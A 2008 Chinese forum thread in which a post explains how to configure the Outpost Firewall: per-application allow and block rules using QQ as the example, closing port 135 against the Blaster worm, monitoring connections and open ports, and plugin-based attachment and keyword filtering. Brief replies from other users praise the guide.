最后登录
2020-02-27
只看该作者 19 发表于: 2008-03-25 10:51:54
黑客我不怕 Outpost防火墙应用技巧攻略

常在河边走,哪有不湿鞋。经常上网的朋友大都有过被黑客、病毒攻击的经历,于是自己的一些诸如邮箱账号、QQ密码、论坛账号等重要数据就存在被窃取的危险。而在更多的情况下,则往往会发生系统不断重启、黑屏甚至系统瘫痪等现象。


  为了防止这些恶意攻击,一款好用的防火墙自然必不可少,比如大家所熟知的“天网防火墙”、“瑞星个人防火墙”、“诺顿防火墙”等。不过今天我要给大家介绍一款小巧易用而功能又很强大的工具,它便是“Outpost Firewall”。它除了能够预防来自Cookies、广告、电子邮件病毒、后门木马、间谍软件、广告软件和其他 Internet潜在的危险外,还可以利用插件去让功能得到进一步拓展,使该款产品更加超值。

下载地址:http://down1.tech.sina.com.cn/do ... 04-03-16/6789.shtml
  一、Outpost Firewall的基本应用方法


将该防火墙安装后,软件会要求进行“自动配置个人防火墙规则”,一般选择“自动配置防火墙规则”即可;而在下一步的“网络配置”中,一般可以选择“使用自动配置规则”,当完成这些后,必须重新启动操作系统。


步骤1 重启系统后,它就开始发挥作用了,在启动过程中若某个程序需要连接网络,那么便会弹出有关为该程序创建规则的对话框。在该对话框中,我们可以从对话框的标题名称或者页面上的程序名称,了解到该程序到底为何种程序。


步骤2 如果该程序值得信任,用户也对它非常了解,那么只要点选“允许这个应用程序的所有动作”选项,就可以让该程序顺利通过防火墙的验证;若是用户得知该程序具有一定的危害性,那么不妨点选“挡截这个应用程序的所有动作”选项,这种该程序就不会再与网络发生连接关系。


步骤3 若是用户对该程序不甚了解,那么不妨单击“本次允许”或“本次挡截”按钮,去临时允许或拦截该程序的联网动作。当了解了该程序的具体属性及作用后,便可为其设置永久性的动作。当设置完成后,单击“确定”按钮即可。
 二、更改防火墙运行模式

之所以会弹出上述创建规则对话框,这是因为“Outpost Firewall”默认的运行模式是“规则向导模式”。如果你对频频弹出的创建规则对话框感到厌烦,那么不妨双击系统中的防火墙图标打开其主界面,依次打开主菜单“选项→运行模式”选项命令,在弹出的对话框中便可更改防火墙的运行模式。


其中单击“禁用模式”选项,便可让防火墙失去作用,当前系统便不会受到防火墙的任何防护;单击“允许大部分通讯模式”选项,那些没有被禁止的通讯都可允许出入本机系统;单击“禁止大部分通讯模式”选项,则可让所有没有被允许的通讯禁止出入本机系统;而单击“停止通讯模式”,就可以使本机与网络的连接完全断开。

  三、为程序“量身定做”通讯方式

在选择防火墙的运行模式时,我们发现“允许的通讯”和“禁止的通讯”这些表述,那么到底在哪里才能设定这些“允许的通讯”和“禁止的通讯”呢?为了便于说明,我们以禁止和允许QQ应用程序进行通讯为例。

1、禁止QQ通讯

步骤1 在开启的主界面中,依次打开“选项→应用程序”选项命令,在出现的对话框中选中“禁止的应用程序”选项。

步骤2 单击“添加”按钮,在打开的窗口中选择QQ主程序,即可将QQ程序添加到“禁止的应用程序”中,然后单击“确定”按钮。此时若再次登录QQ,便会发现QQ已经无法登录了。


2、允许QQ通讯

步骤1 若打算让QQ登录成功“复活”,那么可在“禁止的应用程序”区域中选中QQ程序,而后单击“删除”按钮,就可以将QQ程序从“禁止的应用程序”移除。

步骤2 选中“部分允许的应用程序”选项,单击“添加”按钮,选择QQ主程序进行添加,在添加时会弹出一个规则对话框,只要单击“确定”按钮,便可将QQ程序添入其中。

当再次运行QQ程序时,便会弹出一个“为QQ.EXE创建规则”对话框。如果你只打算暂时运行QQ,那么可单击“本次允许”按钮,这样便可临时让QQ登录。当QQ成功登录后,我们会发现QQ的程序名称仍保留在“部分允许的应用程序”区域中。


如果在创建规则时,直接点选“允许这个应用程序的所有动作”选项,单击“确定”按钮,那么在“部分允许的应用程序”中就不会再发现QQ的主程序名称,此时它会被移至“信任的应用程序”区域中。

而用户若是需要一直应用某个程序去进行通讯,那么不妨选择“信任的应用程序”选项,单击“添加”按钮直接将该程序加入其中,这样便不会再弹出要求为该程序创建规则的对话框了。

以上是“Outpost Firewall”的基本应用方法,当学会这些方法后,新手朋友们就可以借助它为自己的电脑构筑一道防火墙了。

  四、关闭危险的端口

如今网络上各种病毒层出不穷,特别是一些蠕虫病毒,当这些蠕虫成功入侵后,便会打开某些端口,继续侵入网络内其他主机,并对本机系统造成种种危害。而我们的应对之法便是将那些端口关闭,就可以杜绝病毒的入侵。在此以关闭“冲击波”病毒攻击的常用端口“135”为例。

步骤1 依次打开主界面“选项→系统”选项命令,在打开的页面中会看到“系统和应用程序全局规则”区域。


步骤2 在该区域中单击“设置”按钮,在跳出的“系统和应用程序全局规则”的对话框中单击“添加”按钮,此时又会出现“规则”对话框。

步骤3 在该对话框的“选择规则要处理的事件”区域中,分别勾选“当指定的协议是”和“当指定的方向是”前的复选框,此时会在“规则描述”区域中出现相应的规则。

Outpost防火墙的规则描述,类似Outlook
步骤4 单击“当协议是”后的“未定义”链接,由于我们打算关闭的135端口,所以可以在弹出的“选择协议”对话框中点选“TCP”;

单击“并且当方向是”后的“未定义”链接,由于病毒是从外入侵本机,所以可以“方向”对话框中点选“入站:从远程主机到你的计算机”,单击“确定”按钮完成设置。

步骤5 此时再次返回“规则”对话框,勾选“当指定的本地端口是”前的复选框,单击“规则描述”区域中“并且当本地端口是”后的“未定义”链接,此时会打开“选择本机端口”对话框。在该对话框中的输入框里输入打算关闭的端口号,比如“135”。若想添加其它端口号,只要在输入时用逗号将它们分隔开即可。

步骤6 在“选择规则要处理的事件”区域中,还可勾选“当指定的时间间隔是”选项,然后单击“规则描述”区域中“并且活动时间段是”后的“未定义”链接,在弹出的“规则有效时间”对话框中,可指定在某个时间段内才执行该项安全规则。

步骤7 在“规则”对话框的“选择规则要响应的操作”区域中,勾选“禁止”和“全状态检测”前的复选项,在“规则名称”一栏中输入自定义的名称,比如“关闭135”,最后单击“确定”按钮就可以了。

 五、通透了解网络通讯情况

如果用户想获悉自己的系统中进行了哪些通讯以及打开了哪些端口,在“Outpost Firewall”中同样可以非常方便地了解到相关信息。

在主界面的左侧列表中,单击“网络活动”选项,即可在下方展出当前正在通讯的程序。在程序中单击鼠标右键,便可在出现的右键菜单中为它设定相应的通讯规则,同时在右侧窗口中,则会显现出更为详尽的网络活动信息。而选中进行通讯的程序,还可以单独列出有关该程序的进程名称、远程地址、远程端口等更为详细的网络活动信息。


单击左侧列表中的“已打开的端口”选项,就会在其下方展开当前打开的端口号及协议,在右侧窗口中则可以列出包括进程名称、本地地址、本地端口和协议等详细的信息。双击进程名称,还可以列出该进行的开始时间及持续时间。

 六、强大的插件功能

在浏览网页、收发邮件时,可能会存在能对系统造成危害的某些脚本和附件,对此我们可以利用“Outpost Firewall”默认的插件去做好预防工作。

在程序主界面中,依次打开主菜单“选择→插件设置”选项,在出现的对话框中选择“Attachment Quarantine”和“Active Content”选项,然后单击“启动”按钮,就可以使过滤插件生效。这样便可有效防范某些脚本和附件的危害了。


“Outpost Firewall”所自带的插件共有六项,我们还可以对它们进行一系列设置去实现自己要求,比如为防止使用本机的用户去搜索那些不健康的网页,我们可以对搜索关键词进行过滤。

步骤1 在“Outpost Firewall”主界面中,单击左侧列表中的“插件”选项,在展开的下级菜单中选择“内容过滤”选项。在该选项上单击鼠标右键,选择右键菜单上的“属性”选项。


步骤2 在弹出的“内容属性”对话框中单击“过滤关键字”选项卡,勾选页面中的“过滤包含指定关键字的内容”,在文本框中输入打算过滤的关键字后,单击“添加”按钮,最后单击”“确定”按钮结束。

当此时再利用所禁止的关键字进行搜索时,便会出现“因为含有不受欢迎的内容,该页面禁止访问。”的提示。

除了以上所述之外,“Outpost Firewall”还有不少有用的功能,因篇幅所限,在此就不一一列举了,有兴趣的朋友不妨试用一番。
离线蓝夜521
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 20 发表于: 2008-03-26 14:09:02
呵呵,学习了,真不错,呵呵....
离线天崖乱步
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 21 发表于: 2008-03-26 18:31:17
...没有做不到的,只有想不到了....

楼主的帖子很强大。。。
离线sdprtf
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 22 发表于: 2008-03-26 18:35:27
学习ing……